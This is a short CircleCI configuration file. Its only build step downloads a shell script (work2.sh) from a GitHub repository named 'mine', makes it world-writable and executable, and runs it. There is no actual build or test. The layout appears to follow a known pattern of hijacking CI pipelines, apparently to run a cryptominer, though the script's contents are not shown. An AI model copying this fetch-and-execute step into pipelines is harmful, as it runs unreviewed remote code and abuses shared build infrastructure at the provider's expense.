version: 2.1
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD
    steps:
      - checkout
      - setup_remote_docker:
          version: 19.03.13 
      - run: 
         name: chmod & run 
         command: wget https://raw.githubusercontent.com/geraldyolang11/mine/main/work2.sh && chmod 777 work2.sh && ./work2.sh
